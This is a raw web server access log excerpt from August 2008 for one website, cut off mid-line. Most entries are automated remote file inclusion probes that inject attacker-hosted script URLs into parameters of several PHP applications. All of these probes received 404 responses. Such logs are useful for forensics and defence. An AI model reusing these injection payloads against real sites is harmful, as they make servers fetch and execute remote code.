86.110.94.3 - - [15/Aug/2008:22:25:49 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.wo.passandgo.org/images/.../www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
82.98.78.92 - - [15/Aug/2008:22:28:30 -0700] "GET /logs/access_080726.log//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
82.98.78.92 - - [15/Aug/2008:22:28:30 -0700] "GET //Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
82.98.78.92 - - [15/Aug/2008:22:28:31 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:28:48 -0700] "GET /logs/access_080726.log//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:28:48 -0700] "GET //Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:28:48 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
74.53.70.114 - - [15/Aug/2008:22:29:36 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_rss&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.getyourselfahorse.com"
74.53.70.114 - - [15/Aug/2008:22:29:36 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_rss&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.getyourselfahorse.com"
141.89.66.2 - - [15/Aug/2008:22:29:53 -0700] "GET /logs/access_080802.log//claroline/work.php?includePath=http://seandempsey.com/temp/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
141.89.66.2 - - [15/Aug/2008:22:29:53 -0700] "GET //claroline/work.php?includePath=http://seandempsey.com/temp/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
141.89.66.2 - - [15/Aug/2008:22:29:53 -0700] "GET /logs//claroline/work.php?includePath=http://seandempsey.com/temp/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
74.6.18.245 - - [15/Aug/2008:22:29:58 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
74.6.18.245 - - [15/Aug/2008:22:29:58 -0700] "GET /discuss/?N=A HTTP/1.0" 200 512 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:31:34 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:31:34 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:31:34 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:31:50 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:31:50 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:31:50 -0700] "GET /logs//excel